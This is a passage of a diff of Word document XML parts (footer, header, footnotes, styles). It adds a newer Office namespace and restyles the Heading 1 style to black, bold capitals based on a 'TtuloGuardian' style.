xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:endnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -5508,7 +4189,7 @@
 </file>
 
 <file path=word/footer1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:ftr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:pBdr>
@@ -5539,7 +4220,7 @@
 </file>
 
 <file path=word/footnotes.xml><?xml version="1.0" encoding="utf-8"?>
-<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:footnotes xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:footnote w:type="separator" w:id="-1">
     <w:p>
       <w:pPr>
@@ -5564,7 +4245,7 @@
 </file>
 
 <file path=word/header1.xml><?xml version="1.0" encoding="utf-8"?>
-<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:hdr xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:p>
     <w:pPr>
       <w:keepNext/>
@@ -5698,7 +4379,7 @@
 </file>
 
 <file path=word/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du">
+<w:styles xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du">
   <w:docDefaults>
     <w:rPrDefault>
       <w:rPr>
@@ -6099,21 +4780,20 @@
   </w:style>
   <w:style w:type="paragraph" w:styleId="Ttulo1">
     <w:name w:val="heading 1"/>
-    <w:basedOn w:val="Normal"/>
+    <w:basedOn w:val="TtuloGuardian"/>
     <w:next w:val="Normal"/>
     <w:link w:val="Ttulo1Char"/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
-    <w:rsid w:val="00C82D7E"/>
+    <w:rsid w:val="000D0403"/>
     <w:pPr>
       <w:keepNext/>
       <w:keepLines/>
       <w:spacing w:before="360" w:after="80"/>
-      <w:outlineLvl w:val="0"/>
     </w:pPr>
     <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:color w:val="000000" w:themeColor="text1"/>
       <w:sz w:val="40"/>
       <w:szCs w:val="40"/>
     </w:rPr>
@@ -6299,6 +4979,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Fontepargpadro">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
+    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">
@@ -6358,10 +5039,13 @@
     <w:basedOn w:val="Fontepargpadro"/>
     <w:link w:val="Ttulo1"/>
     <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00C82D7E"/>
+    <w:rsid w:val="000D0403"/>
     <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
+      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Arial" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
+      <w:b/>
+      <w:bCs/>
+      <w:caps/>
+      <w:color w:val="000000" w:themeColor="text1"/>
       <w:sz w:val="40"/>
       <w:szCs w:val="40"/>
     </w:rPr>
